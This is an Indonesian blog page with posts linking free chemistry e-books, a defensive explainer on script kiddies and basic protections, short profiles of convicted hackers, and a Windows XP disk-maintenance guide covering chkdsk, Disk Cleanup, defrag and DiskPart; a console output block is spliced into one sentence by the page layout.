CK Cybers Time

Thursday, November 1, 2007

Free E-Book Kimia

Saya baru mendapatkan link untuk beberapa buku kimia hasil terjemahan dari situs jurusan kimia fisik-anorganik ITB. Buku ini bisa di download secara gratis, baik secara keseluruhan atau per bab. Saya mendapatkan link ini saat sedang ingin mempelajari tentang ilmu kimia.

Kimia Anorganik, terjemahan dari versi Inggris buku Muki Kagaku, Taro Saito
Keseluruhan Buku Kimia Anorganik
Bagian depan
Bab 1 Unsur dan Periodisitas

Bab 2 Ikatan dan Struktur
Bab 3 Reaksi Anorganik
Bab 4 Kimia Unsur Non-Logam
Bab 5 Kimia Logam Golongan Utama
Bab 6 Kimia Logam Transisi
Bab 7 Lantanoid dan aktinoid
Bab 8 Reaksi dan Sifat-sifat Fisik
Indeks
Solusi

Pengantar Kimia, terjemahan dari versi Inggris buku Basic Chemistry, Y. Takeuchi
Keseluruhan Buku Pengantar Kimia (5,71 MB)
Bab 1-2 => Bab 3-4 => Bab 5-6 => Bab 7-8 => Bab 9-10 => Bab 11-14

Kimia Kuantum, terjemahan dari versi Inggris buku Quantum Chemistry, Koichi Ohno
Keseluruhan Buku Kimia kuantum (6.5 MB)
Daftar isi => Bab 1 => Bab 2 => Bab 3 => Bab 4 => Bab 5 => Bab 6

Pedoman EYD

Pedoman Tata Nama Kimia

Demikian semoga bermanfaat bagi yang memerlukannya, pesannya tidak boleh di perdagangankan dalam bentuk fisik. Ini sesuai kesepakatan dengan penerbit (Iwanami Shoten) buku-buku tersebut dapat digunakan untuk pendidikan dan tidak dapat disebar luaskan dalam bentuk tercetak.

Semoga berguna untuk teman yang lain !


Script Kiddie

Script Kiddie

Jika suatu hari seorang rekan Anda memamerkan sederet nomor kartu kredit yang diperolehnya secara ilegal, apa yang Anda lakukan? Jika Anda berniat memberinya ucapan selamat, pikirkan bahwa bisa jadi nomor kartu kredit Anda termasuk salah satu korbannya! Langkah yang lebih baik, mungkin Anda sebaiknya mencatat nama rekan Anda sebagai daftar orang yang pantas disebut script kiddie, dan pelajari cara kerja dan pencegahan script kiddie untuk melindungi sistem komputer Anda dari tangan-tangan jahil. “Nafsu besar tenaga kurang” rupanya tidak berlaku pada sistem keamanan komputer, terkadang tidak dibutuhkan pengetahuan dan keahlian yang canggih agar seseorang dapat membobol system komputer Anda. Hal ini dikarenakan “tenaga yang kurang” tersebut sudah digantikan dengan tools canggih, bahkan kadang dengan tampilan GUI yang user friendly, sehingga yang diperlukan hanya “nafsu besar” untuk menjalankannya dan mengarahkan target pada komputer Anda. Dari sanalah script kiddie beraksi.

Definisi Script Kiddie

Di dunia hacker, seorang script kiddie diartikan sebagai seseorang dengan niat buruk yang menggunakan program lain untuk menyerang sistem komputer ataupun melakukan deface pada website. Disebut sebagai script kiddie bukanlah merupakan kebanggaan, karena umumnya diasumsikan sebagai seorang anak (kid) yang kurang memiliki kemampuan atau kompetensi untuk membuat tools sendiri, dan sering kali hanya bertujuan untuk membuat sensasi. Bagaimanapun, kehadiran script kiddie dapat menyebabkan permasalahan serius pada sistem yang diserang. Script kiddie sendiri umumnya tidak menargetkan secara spesifi k komputer atau website tertentu, tetapi lebih mengandalkan hasil scan dari tools yang digunakan untuk menemukan kelemahan sistem. Cepat atau lambat, secara acak mereka akan menemukan sebuah sistem yang dapat diserang. Target acak inilah yang membuat script kiddie merupakan sebuah ancaman, siapapun dapat menjadi target script kiddie jika terdapat kelemahan pada sistemnya. Jika sistem Anda terhubung pada Internet, maka Anda adalah salah satu dari jutaan sistem di Internet yang dapat saja diserang oleh script kiddie. Dari gambaran di atas, jelaslah bahwa walaupun Anda merasa tidak memiliki musuh atau merasa tidak ada yang menginginkan informasi yang tersimpan pada sistem Anda, tidak berarti sistem Anda aman dan tidak akan ada yang mengganggu.

Senjata Script Kiddie

Terdapat banyak tool yang mudah untuk digunakan dan dapat diperoleh melalui Internet, siapapun dan di manapun dapat men-download dan menggunakannya. Metodologi umum yang digunakan adalah melakukan scan pada daftar IP/web untuk mencari sebuah kelemahan yang spesifi k. Saat kelemahan tersebut ditemukan, maka lakukan proses exploit yang bisa jadi merusak. Untuk menjadi script kiddie, seseorang tidak perlu lembur bekerja siang malam, karena banyak tool yang berjalan secara otomatis dan menyimpan daftar target saat script kiddie yang menjalankannya tertidur nyenyak. Strategi yang umum dilakukan oleh tools yang digunakan para script kiddie adalah membuat daftar IP yang dapat di-scan, dan melakukan scan terhadap IP tersebut untuk menemukan celah lubang keamanan. Cara kerja yang dilakukan tools tersebut adalah dengan mengirimkan packet tertentu dan menangkap respon yang dikembalikan dari IP target. Apakah proses ini dapat tertangkap oleh system yang sedang di-scan? Jawabnya adalah ya, tetapi tidak semua orang memonitor sistem mereka, sehingga tidak menyadari adanya penyerangan ini. Berita buruk lainnya, bahkan jika Anda tidak menemukan sistem Anda sedang discan, tidak berarti Anda telah aman dari script kiddie. Hal ini dapat terjadi karena tools yang digunakan script kiddie juga dapat masuk melalui port yang sengaja dibuka oleh sistem Anda, misalnya port yang digunakan untuk keperluan database.

Hal Buruk yang Dapat Terjadi

Sekali kelemahan sistem Anda telah tereksploitasi oleh penyusup, hal berikutnya yang dapat terjadi tentulah sangat tidak Anda harapkan. Beberapa hal buruk yang umum dilakukan script kiddie:

1. Deface Website.

Saat seseorang telah menyusup ke dalam web server dan memiliki hak akses, maka bersiaplah melihat “salam perkenalan” dari

sang penyusup pada halaman muka website Anda. Hal ini yang dinamakan dengan deface website. Sang penyusup akan mengganti halaman muka dengan halaman yang dipersiapkan oleh penyusup, pesan yang ditampilkan oleh script kiddie sering berupa id/nick name beserta pesan yang ditujukan pada orang yang mengenalnya. Tentunya bagi mereka yang terpenting adalah keberhasilan menjebol sistem dan memamerkannya, tanpa perencanaan target ataupun motif tertentu.

2. Menginfeksi Sistem.

Apa saja yang dapat menginfeksi system Anda sekali sang penyusup berhasil masuk? Virus tentu adalah salah satunya, tetapi bukan itu saja, sistem Anda bisa jadi menerima infeksi dari worm atau backdoor. Walau script kiddie tidak memiliki target korban spesifi k, tidak berarti mereka tidak akan merusak. Komputer yang disusupi oleh backdoor bisa jadi bertujuan untuk menjadikan komputer Anda sebagai “zombie” dengan berbagai tujuan, misalnya untuk mengirimkan e-mail spam atau melakukan serangan DDoS (Distributed Denial of Service Attack).

3. Melakukan Operasi File.

Jangan mengharapkan seorang script kiddie memiliki rasa hormat terhadap privasi Anda, sekali ia mendapatkan hak akses maka ia mungkin tidak sempat memikirkan perasaan Anda saat menyalahgunakan hak akses. Sekalipun itu adalah mengambil atau menghapus fi le berharga Anda.

4. Mengambil Password.

Password dengan strong type (memiliki derajat kesulitan yang tinggi untuk ditebak) kadang tidak berdaya saat komputer Anda telah disusupi program keylogger, ataupun jika metode enkripsi password tersebut telah dapat dipecahkan oleh program tertentu. Bagaimanapun, password dengan strong type tentunya memperkecil kemungkinan untuk ditebak atau diserang dengan bruteforce attack (penyerangan berdasarkan dictionary atau kombinasi yang dilakukan secara terus-menerus).

Proteksi

Setiap serangan tentunya harus diantisipasi, termasuk kegiatan para script kiddie ini. Terdapat beberapa cara untuk melakukan

proteksi terhadap serangan tidak bertanggung- jawab tersebut. Dengan melihat pola penyerangan script kiddie yang mencari celah keamanan yang umum, maka Anda harus menjaga system Anda semaksimal mungkin, beberapa pencegahan yang dapat Anda lakukan:

1. Minimalisasi Sistem.

Salah satu celah keamanan yang dapat disusupi adalah service yang sedang dijalankan pada komputer Anda. Karena itu pastikan Anda meminimalisasi sistem dengan hanya menjalankan service yang diperlukan. Anda dapat menonaktifkan service yang tidak digunakan. Usahakan tidak menjalankan sesuatu dengan hak akses tertinggi (root), bila memang tidak diperlukan. Sederhanakan sistem dan kurangi hal-hal yang dapat mengakibatkan permasalahan.

2. Selalu Update.

Anda juga perlu memastikan bahwa service yang Anda jalankan merupakan versi/patch paling update. Hal ini dikarenakan service yang berjalan dapat menjadi bumerang bagi sistem jika ditemukan exploit pada service yang dapat memungkinkan penyusupan ke dalam sistem.

3. Manajemen Password.

Jika sebelumnya telah disebutkan password dengan strong type juga masih memiliki kemungkinan untuk ditembus, tentunya tidak berarti Anda harus meremehkan hal ini. Berhati-hatilah jika Anda membuat password yang umum seperti “admin”, “123”, “qwerty”, “asdf”, bahkan password seperti “p@$$w0rd” masih termasuk kategori password yang memiliki tingkat kesulitan yang rendah untuk ditebak. Bisa jadi seorang script kiddie hanya membutuhkan sebuah search engine untuk mendapatkan daftar halaman login website Anda di antara daftar website lain yang dicari olehnya, jika Anda memberi password yang mudah ditebak, tampaknya kebobolan hanya tinggal menunggu waktu.

4. Gunakan Firewall.

Firewall tentunya tidak bisa melindungi Anda dari segala serangan, terutama jika serangan datang dari port yang diijinkan oleh Firewall (misalnya port 80 yang umumnya digunakan untuk web server). Tetapi tentunya, penggunaan firewall dapat lebih membantu banyak untuk menutupi kelemahan-kelemahan (vulneralibility) sebuah sistem.

5. Konfigurasi Server.

Konfi gurasi yang kurang baik pada server juga dapat menyebabkan timbulnya celahcelah yang dapat disusupi, sehingga tidak heran seorang administrator server sudah seharusnya memiliki pengetahuan yang memadai. Hal yang terutama adalah memastikan konfi gurasi yang aman agar pihak luar tidak memiliki hak akses yang merugikan pada web server.

6. Keamanan Aplikasi.

Celah keamanan juga dapat timbul dari aplikasi Anda! Terutama jika aplikasi Anda melakukan proses ke dalam database berdasarkan parameter input dari pengguna (baca: penyusup). Parameter input dapat “diracuni” sehingga aplikasi mengirimkan instruksi yang tidak diinginkan dalam pemrosesan database dengan SQL (Structured Query Language). Dalam hal ini, perintah SQL yang dikirim telah dimodifi kasi oleh penyusup. Hal ini dikenal dengan teknik SQL Injection. SQL Injection memanfaatkan celah pada SQL (Structured Query Language) yang digunakan untuk melakukan operasi pada database, sehingga jika Anda memiliki website atau aplikasi client-server yang mengeksekusi perintah SQL berdasarkan input dari pengguna, maka pastikan Anda melakukan validasi yang cukup dari sisi server.

7. Gunakan Tools.

Jika para script kiddie menggunakan tools untuk mencari kelemahan sistem Anda, maka gunakan cara yang sama agar Anda mengetahui kelemahan sistem Anda. Bukankah lebih baik, jika Anda yang terlebih dahulu mengetahui kelemahan sistem Anda daripada orang lain? Tools yang didesain untuk mencari kelemahan sistem disebut dengan Vulnerability Scanner. Pada prinsipnya, Vulnerability Scanner akan melakukan scan IP address, sistem operasi, dan aplikasi yang berjalan, untuk kemudian menentukan patch/update pada operating system dan aplikasi. Beberapa pilihan Vulnerability Scanner di antaranya adalah Nmap, Nessus, Nikto, dan lain sebagainya.

Script Kiddie: Sebuah Kebanggaan?

Tidak dapat dipungkiri, saat berhasil menembus keamanan sebuah sistem, maka terdapat sebuah kebanggaan sendiri, terlepas bagaimana cara yang dilakukan. Hal inilah yang menyebabkan kelahiran para script kiddie setiap harinya di seluruh dunia. Tentu saja tidak banyak waktu dan ketrampilan yang mereka butuhkan untuk menjadi script kiddie. Tetapi jika direnungkan, manakah yang lebih membanggakan, mampu menembus keamanan atau mampu menangkis serangan, yang berarti mampu membangun system keamanan yang kuat? Secara pribadi tentunya sama-sama membanggakan bagi pelakunya karena tujuannya tercapai, bedanya bagi yang merugikan orang lain, kebanggaan adalah miliknya sendiri dan secara psikologis tidak akan pernah terpuaskan. Sedangkan bagi yang melindungi orang lain, kebanggaannya merupakan sebuah kehormatan dan memiliki nilai moral yang akan selalu dihargai siapapun. Bagaimanapun, kata script kiddie sendiri sebenarnya tidak memiliki arti negatif dari sisi linguistik, dan banyak sekali hacker dan profesional keamanan sistem yang mengawali bidangnya dari nol dengan melakukan eksperimen seperti yang dilakukan script kiddie. Dapat dibayangkan pula, bukankah lebih baik jika saat kita berhasil bereksperimen dan menembus sebuah sistem keamanan, kita tidak merusaknya tetapi memberikan peringatan dan saran bagi pengelola system tersebut? Hal ini tentunya lebih terpuji. Jika Anda telah mampu melakukan apa yang dapat dilakukan script kiddie, maka jangan berhenti, karena hal tersebut relative dapat dilakukan dalam hitungan hari atau bahkan hitungan jam. Terus memperkaya pengetahuan dan kemampuan Anda, sehingga apa yang Anda awali dari sana akan dapat berkembang dan akhirnya memiliki nilai manfaat._

_ http://en.wikipedia.org/wiki/Script_ kiddie

_ http://www.rootprompt.org/article. php3?article=159

_ http://en.wikipedia.org/wiki/ Vulnerability_scanner


Source : PC Media

Hacker - Hacker Kriminal Dunia

Hacker Kriminal Dunia

Hacker-hacker di bawah ini merupakan hacker yang telah ditahan dengan tuduhan kriminal. Beberapa dari mereka menjalankan aksi hacker-nya untuk tujuan mencari uang, sisanya hanya untuk iseng. Kevin Mitnick mungkin hacker paling terkenal sejagad. The Departement of Justice di AS melabelinya sebagai “buronan criminal komputer terbesar dalam sejarah AS.” Bahkan aksinya sempat difi lmkan: “Takedown” dan “Freedom Downtime”. Aksi Mitnick pada awalnya hanya meng-hack system kartu otomatis di bis Los Angeles agar dapat berpergian gratis. Kemudian Mitnick merupakan orang pertama yang diburu karena meng-hack ke jaringan komputer dan mencuri software di Digital Equipment Corporation. Mitnick sempat tidak diketahui keberadaannya selama 2,5 tahun. Kejatuhannya diawali pada saat ia meng-hack computer temannya sekaligus salah satu hacker ternama, Tsutomu Shimomura. Mitnick sekarang telah sadar dan menjadi anggota sosial yang produktif. Setelah menjalani 5 tahun 8 bulan di pengasingan, Mitnick sekarang menjadi ahli keamanan komputer, konsultan dan pembicara. Kemudian Adrian Lamo yang sempat menjebol perusahaan besar seperti Microsoft dan The New York Times. Lamo menggunakan koneksi Internet dari cafe-cafe, Kinko dan perpustakaan, dan Lamo mendapat julukan “The Homeless Hacker”. Lamo juga sering menemukan celah keamanan pada software-software ternama dan menjebolnya. Karena ulahnya menjebol jaringan The New York Times, Lamo menjadi incaran teratas pihak keamanan dan diharuskan membayar US$65.000 sebagai ganti rugi. Sebagai tambahan, Lamo diganjar hukuman 6 bulan dan 2 tahun percobaan. Lamo sekarang menjadi pembicara seminar dan jurnalis berprestasi.

Jonathan James pada umur 16 tahun merupakan hacker termuda yang dijebloskan ke penjara karena aksi hacking-nya. Aksi terbesar James adalah pada saat ia menjebol Defense Threat Reduction Agency, yang merupakan cabang dari departemen keamanan AS. Lewat aksinya ini, James mampu mencuri username dan password dan melihat e-maile- mail rahasia. James juga berhasil menjebol komputer NASA dan mencuri software dengan harga US$1.7 juta. The Justice Dapartement AS mengatakan bahwa “software yang dicuri James berkaitan dengan stasiun ruang angkasa Internasional, termasuk pengaturan suhu dan kelembapan di ruang angkasa.” Karena ulah James, NASA harus menutup semua jaringan komputernya dengan biaya US$41.000. Saat ini James menjadi ahli keamanan komputer di perusahaanperusahaan besar.

Robert Tappan Morris merupakan anak dari Robert Morris, mantan ilmuwan dari National Security Agency. Robert adalah pencipta worm Morris. Worm ini merupakan worm pertama yang menyebar melalui Internet. Robert menciptakan worm Morris hanya untuk me ngetahui besarnya dunia Internet pada saat itu. Worm ini merepropduksi di rinya sendiri tanpa bias dikontrol, mematikan ribuan computer sampai komputer tersebut benar-benar tidak berfungsi. Robert sekarang menjadi professor di MIT Computer Science and Artifi cial Intelligence Laboratory dan fokusnya adalah arsitektur komputer dan jaringan.

Kevin Poulsen atau lebih dikenal dengan Dark Dante mengawali aksinya dengan menjebol jaringan telepon radio Los Angeles KIIS-FM, aksinya ini membuatnya mendapatkan sebuah mobil Porsche. FBI mulai memburu Poulsen karena menjebol database FBI dan komputer federal untuk informasi penyadapan. Poulsen merupakan jagoan meng-hack jaringan telepon dan Poulsen ditangkap di sebuah supermarket dan diganjar hukuman 5 tahun. Sejak ditahan, Poulsen bekerja sebagai seorang jurnalis dan dipromosikan menjadi editor senior di sebuah koran terkemuka, Wired News. Artikel populernya adalah mengidentifi kasi tertuduh 744 pelecehan seksual di profi le Myspace.

Tuesday, October 2, 2007

Maintain Harddisk

Memelihara Harddisk


Windows XP menyediakaan tool pemeliharaan disk, yang bias Anda gunakan untuk mencegah timbulnya masalah. Beberapa dari tools tersebut ada di sini. Dengan tool disk, Anda bisa melihat informasi disk dan memperbaiki masalah sebelum semakin serius. Pada tabel, Anda bias melihat beberapa tool yang tersedia. Dengan My Computer Information dan Windows Update, Anda bisa mengecek status komputer secara periodik, mengimplementasi update yang bisa meningkatkan performa Windows XP, dan membantu mengatasi masalah yang disebabkan oleh driver perangkat yang tidak kompatibel.

Chkdsk

Chkdsk (Chkdsk.exe) merupakan tool command-line yang mengecek masalah pada volume, dan memperbaikinya jika ditemukan. Chkdsk bisa memperbaiki masalah yang berhubungan dengan bad sector, lost cluster, cross-linked fi le, dan directory error. Untuk disk yang diformat dengan NTFS, Chkdsk pada Windows XP bisa menyediakan peningkatan performa yang signifikan (dibandingkan dengan yang terdapat pada Windows 2000 Professional, dan Windows NT 4.0 Workstation) pada waktu menggunakan parameter baru /i dan /c. Kedua paramater tersebut memerintahkan Chkdsk.exe untuk melewati beberapa pengecekan sistem fi le tertentu, yang akan mengurangi waktu yang dibutuhkan untuk menjalankan Chkdsk. Anda harus masuk sebagai administrator atau anggota grup Administrators untuk menggunakan Chkdsk. Jika Anda mau Chkdsk memperbaiki error, tidak boleh ada fi le yang dibuka. Jika ada fi le yang dibuka, akan muncul error berikut: Chkdsk cannot run because the volume is in use by another process. Would you like to schedule this volume to be checked the next time the system restarts? (Y/N). Jika Anda ingin mengecek drive pada waktu berikutnya me-restart komputer, Chkdsk otomatis akan mengecek drive dan memperbaiki error, pada waktu Anda me-restart komputer. Jika partisi drive merupakan partisi boot, maka Chkdsk otomatis me-restart komputer setelah mengecek drive Chkdsk hanya akan memperbaiki error jika Anda menggunakan parameter /f pada baris perintah. Chkdsk harus bisa mengunci drive untuk memperbaiki error. Karena perbaikan biasanya mengubah file allocation table hard disk, dan kadang menyebabkan hilangnya data, Chkdsk mengirim pesan konfirmasi seperti berikut: 10 lost allocation units found in 3 chains. Convert lost chains to fi les? Jika Anda menekan Y, Windows menyimpan setiap unit bagian yang hilang ke direktori root sebagai fi le dengan nama dalam format Filennnn.chk. Setelah Chkdsk selesai, Anda bisa mengecek fi le tersebut untuk melihat apakah berisi data yang Anda butuhkan. Jika Anda menekan N, Windows memperbaiki disk, tetapi tidak menyimpan isi unit bagian yang hilang. Jika Anda tidak menggunakan parameter /f, Chkdsk mengirim pesan jika file perlu diperbaiki, tetapi ia tidak akan memperbaiki error apapun. Jika Anda menggunakan chkdsk /f pada disk yang sangat besar (misalnya, 70 gigabytes) atau disk dengan jumlah file yang sangat banyak (misalnya, satu juta file), Chkdsk bisa membutuhkan waktu yang lama untuk selesai. Komputer tidak bisa digunakan selama proses tersebut, karena Chkdsk tidak memberikan kontrol sampai ia selesai. Jika Anda menggunakan parameter /f, Chkdsk akan mengirim pesan error jika ada fi le yang dibuka. Jika Anda tidak menggunakan parameter /f dan ada fi le yang dibuka, Chkdsk akan melaporkan adanya unit bagian yang hilang. Ini bisa terjadi jika fi le yang dibuka belum tercatat di fi le allocation table. Jika Chkdsk melaporkan adanya sejumlah besar unit bagian yang hilang, perbaiki disk. Selain versi command-line, Anda bias menjalankan Chkdsk dari My Computer atau Windows Explorer. Untuk menjalankan Chkdsk dari command prompt, ketik chkdsk pada command prompt. Untuk menjalankan Chkdsk dari My Computer atau Windows Explorer, klik kanan volume yang ingin Anda cek, dan kemudian klik Properties. Pada tab Tools, klik Check Now. Untuk menjalankan Chkdsk dalam mode read-only, klik Start. Untuk memperbaiki error tanpa memeriksa volume, beri tanda centang (_) Automatically fi x fi le system errors, dan kemudian klik Start.Untuk memperbaiki error, mencari bad sector, dan memulihkan data, beri tanda centang Scan for and attempt recovery of bad sectors, dan kemudian klik Start.

Disk Cleanup

Pada waktu menjalankan operating system sekompleks Windows, Anda mungkin tidak selalu tahu arti semua fi le pada computer Anda. Kadang-kadang Windows menggunakan fi le untuk keperluan tertentu, dan kemudian menyimpan mereka dalam suatu folder yang digunakan untuk fi le temporer. Atau, Anda menginstalasi komponen Windows yang tidak lagi digunakan. Karena berbagai alasan (termasuk keku rangan ruang harddisk) Anda mungkin ingin mengurangi jumlah fi le pada disk, atau menambah ruang kosong. Kurangnya ruang disk yang kosong bisa menyebabkan ba nyak masalah mulai dari pesan Stop sampai korupsi fi le. Untuk menambah ruang kosong, Anda bisa memindahkan file ke volume lain, atau mengar sip mereka ke media backup; mengompres file atau disk supaya ruang yang dibutuhkan untuk menyimpan data berkurang; atau menghapus fi le yang tidak dibutuhkan. Disk Cleanup (Cleanmgr.exe) memungkinkan Anda untuk menghapus fi le Internet temporer, menghapus file program yang di-download dari Internet (kontrol ActiveX dan Java applet), mengosongkan Recycle Bin, Menghapus file temporer Windows, menghapus komponen Windows yang tidak digunakan, menghapus program yang tidak lagi digunakan, dan mengompresi fi le yang jarang diakses. Untuk menjalankan Disk Cleanup, ketik cleanmgr pada command prompt. Pilih drive yang ingin Anda bersihkan, dan kemudian klik OK. Pada tab Disk Cleanup, pilih suatu opsi atau klik tab More Options untuk menghapus restore point, dan meng-uninstall komponen Windows atau aplikasi. Untuk mengompresi file dengan Disk Cleanup, beri tanda centang (_) Compress old fi les pada tab Disk Cleanup. Pada boks Description, klik Options untuk memilih jangka waktu tunggu (dalam hari) sebelum mengompres fi le. Untuk informasi lebih lanjut tentang Disk Cleanup, klik Tools pada Help and Support Center. Jika Anda menjalankan utility Disk Cleanup Windows XP secara rutin untuk menjaga supaya isi harddisk tetap teratur, maka Anda tentu menginginkan suatu cara untuk menyimpan setting, supaya Anda tidak perlu mengonfi gurasi ulang utility tersebut setiap kali dijalankan. Ada cara untuk menyimpan setting Anda, yaitu sebagai berikut: buka kotak dialog Run dengan menekan tombol [Windows]R. Pada text box Open, ketik perintah Cleanmgr /d x: /sageset:#; di mana Cleanmgr adalah nama fi le executable Disk Cleanup, /d x

KATEGORI DESKRIPSI

General Menampilkan rincian komputer, seperti kecepatan prosesor dan jumlah memory fi sik dan ruang disk yang tersedia. Status Menampilkan informasi diagnosis yang bisa membantu Anda dalam menyelesaikan permasalahan yang ada, dan tip yang bisa membantu Anda untuk menghindari masalah. Hardware Berisi rincian informasi tentang hardware internal dan eksternal, yang terinstalasi pada komputer Anda. Software Menampilkan software sistem yang terinstalasi pada komputer Anda. View computer Menampilkan informasi untuk computer information for remote, jika Anda mempunyai hak another computer akses administratif ke komputer remote tersebut. adalah huruf drive yang ingin dibersihkan; /sageset adalah perintah konfi gurasi khusus yang memberitahu Disk Cleanup supaya menyimpan setting di registry; dan # adalah nomor unik antara 0 sampai 65.535 yang menghasilkan fi le setting konfi gurasi yang berbeda-beda. Sebagai contoh, Anda bisa membuat fi le setting konfi gurasi yang pertama untuk drive C dengan mengetik Cleanmgr /d C: /sageset:1 pada text box Open. Pada waktu Anda melihat kotak dialog Disk Cleanup, pilih check box di sebelah kategori fi le yang ingin dihilangkan dari harddisk. Klik OK untuk menyimpan setting registry. Untuk menjalankan Disk Cleanup dengan setting yang disimpan, ketik perintah Cleanmgr /sagerun:#. Pada perintah tersebut, Cleanmgr adalah nama fi le executable Disk Cleanup; /sagerun adalah perintah konfi gurasi, yang meminta Disk Cleanup untuk menerima dan menyimpan setting dari registry; dan # adalah nomor yang digunakan sebagai label fi le setting konfi gurasi Anda.

Disk Defragmenter

Windows XP menyediakan dua metode untuk men-defragmentasi volume: Disk Defragmenter snap-in (Dfrg.msc), dan tool command-line Disk Defragmenter (Defrag.exe). Kedua tool mengatur fi le, folder, dan program sehingga mereka ditempatkan berdampingan. Tool juga mengatur ruang kosong, memindahkannya ke bagian akhir volume. Hasilnya, operating system bisa menulis fi le ke harddisk secara teratur sehingga performa meningkat. Pada waktu menjalankan DiskDefragmenter Windows XP, otomatis akan mendefragmentasi fi le boot Anda. Opsi ini secara default diaktifkan: Anda bisa mengeceknya dengan membuka Registry Editor dan lihat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Dfrg\BootOptimizeFunction. Pastikan Enable diset ke Y. Untuk menjalankan Disk Defragmenter snap-in, ketik drfg.msc pada kotak dialog Run. Anda juga bisa menjalankan Disk Defragmenter dari tool Computer Management. Untuk menjalankan tool command-line Defrag.exe, ketik defrag pada command prompt. Cara sederhana untuk mempercepat proses defrag Windows XP adalah dengan me-restart sistem sebelum menjalankan Defrag. Ini supaya operating system bisa membersihkan file swap/paging dan mereset- nya ke ukuran default. Dengan demikian, Defrag bisa focus ke data yang diperlukan pada harddisk tanpa harus menghentikan, dan mengelola fi le swap berukuran besar yang dimuati dengan data yang tidak diperlukan Cara lain untuk mempercepat proses defrag pada Windows XP adalah dengan membuat muncul pada waktu startup. Untungnya, Anda bisa melakukannya dengan mudah, dengan mengedit registry. Jalankan Registry Editor (regedit.exe). Buka HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVer-

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Administrator>chkdsk d:/f/I The type of the file system is NTFS. Volume label is DATA. WARNING! I parameter specified. Your drive may still be corrupt even after running CHKDSK. CHKDSK is verifying files (stage 1 of 3)... File verification completed. CHKDSK is verifying indexes (stage 2 of 3)... Index verification completed. CHKDSK is verifying security descriptors (stage 3 of 3)... Security descriptor verification completed. 20482843 KB total disk space. 12480992 KB in 23457 files. 8648 KB in 1761 indexes. 0 KB in bad sectors. 91951 KB in use by the system. 65536 KB occupied by the log file. 7901252 KB available on disk. 4096 bytes in each allocation unit. 5120710 total allocation units on disk. 1975313 allocation units available on disk. C:\Documents and Settings\Administrator>fsutil fsinfo volumeinfo d: Volume Name : DATA Volume Serial Number : 0xd0abd1b4 Max Component Length : 255 File System Name : NTFS Supports Case-sensitive filenames Preserves Case of filenames Supports Unicode in filenames Preserves & Enforces ACL’s Supports file-based Compression Supports Disk Quotas Supports Sparse files Supports Reparse Points Supports Object Identifiers Supports Encrypted File System Supports Named Streams C:\Documents and Settings\Administrator>fsutil fsinfo volumeinfo e: Volume Name : Volume Serial Number : 0x435fcca5 Max Component Length : 255 File System Name : FAT32 Preserves Case of filenames Supports Unicode in filenames C:\Documents and Settings\Administrator>sion\RunOnce. Klik kanan subkey RunOnce dan pilih New, String Value. Beri nama Defrag, dan tekan [Enter] dua kali. Ketik Defrag.exe c: /f pada text box Value Data, dan klik OK. Tutup Registry Editor dan restart Windows. Proses defrag akan dimulai, setelah Anda mengetik password, dan menekan [Enter] (perlu diingat bahwa nilai yang dimasukkan ke key RunOnce akan segera dihapus, setelah perintah dijalankan).

Disk Management dan DiskPart

Windows XP menyediakan dua tool yang bias Anda gunakan untuk mengelola harddisk dan partisi atau volume: Disk Management snapin (Diskmgmt.msc), dan tool command-line DiskPart (Diskpart.exe). Dengan Disk Management, Anda bisa menginisialisasi disk baru, membuat volume, dan memformat volume dengan sistem fi le FAT, FAT32, atau NTFS. Disk Management memungkinkan Anda untuk melakukan pekerjaan yang berhubungan dengan disk tanpa mematikan komputer; sebagian besar perubahan konfi gurasi langsung terimplementasi. DiskPart merupakan intepreter perintah mode teks yang memungkinkan Anda untuk mengelola objek (disk, partisi, atau volume), dengan menggunakan script atau input langsung dari command prompt. Sebelum menggunakan Diskpart, Anda harus memilih dulu obJek yang menjadi fokus. Setiap perintah Diskpart yang Anda ketik, hanya berlaku pada objek tersebut. Anda bisa melihat daftar objek yang tersedia dan memilih nomor objek atau huruf drive, dengan menggunakan perintah list disk, list volume, dan list partition. Perintah list disk, list volume menampilkan semua disk, dan volume pada komputer. Namun, perintah list partition hanya menampilkan partisi pada disk yang menjadi fokus. Pada waktu Anda menggunakan perintah list, muncul tanda bintang (*) di sebelah objek yang menjadi fokus Anda, pilih objek berdasarkan nomor atau huruf drive-nya, seperti disk 0, partition 1, volume 3, atau volume C. Pada waktu Anda memilih suatu objek, objek tersebut tetap akan menjadi fokus sampai Anda memilih objek lain. Sebagai contoh, jika fokus diset ke disk 0, dan Anda memilih volume 8 pada disk 2, fokus akan pindah dari disk 0 ke disk 2, volume 8. Beberapa perintah otomatis mengubah fokus. Sebagai contoh pada waktu Anda membuat partisi baru, focus otomatis pindah ke partisi yang baru. Anda hanya bisa fokus ke partisi pada disk yang dipilih. Pada waktu partisi menjadi fokus, volumenya (jika ada) juga menjadi fokus. Pada waktu volume menjadi fokus, disk dan partisinya juga menjadi fokus, jika volume menunjuk ke satu partisi. Kedua tool menggunakan sejumlah deskripsi untuk menunjukkan status disk, dan volume pada komputer. Sebagai contoh, jika tidak ada error, maka tool akan menampilkan status Online untuk disk, dan status Healthy untuk volume pada disk. Dengan menjalankan tool secara periodik, Anda bisa mengidentifi kasi masalah disk atau volume, dan memperbaiki mereka sebelum menyebabkan hilangnya data. Anda harus masuk sebagai administrator atau anggota grup Administrator, untuk menggunakan Disk Management atau DiskPart. Untuk menjalankan Disk Management snap-on, ketik diskmgmt.msc pada kotak dialog Run. Anda juga bisa menjalankan Disk Defragmenter dari tool Computer Management. Untuk menjalankan DiskPart dan melihat daftar perintahnya, ketik diskpart pada command prompt. Pada prompt DISKPART>, ketik commands.

Fsutil.exe

Fsutil (Fsutil.exe) merupakan tool commandline yang bisa Anda gunakan untuk melakukan pekerjaan yang berhubungan dengan sistem fi le FAT dan NTFS, seperti meng-query atau mengubah atribut fi le dan disk, atau memperbesar volume. Anda harus masuk sebagai administrator atau anggota grup Administrators untuk menggunakan Fsutil. Untuk melihat daftar subperintah Fsutil, ketik fsutil dari command prompt. Untuk mendapatkan help subperintah Fsutil, gunakan syntax berikut: fsutil subcommand help pada command prompt. Untuk informasi lebih lanjut tentang Fsutil, klik Tools pada Help and Support Center.

My Computer Information pada Help and Support

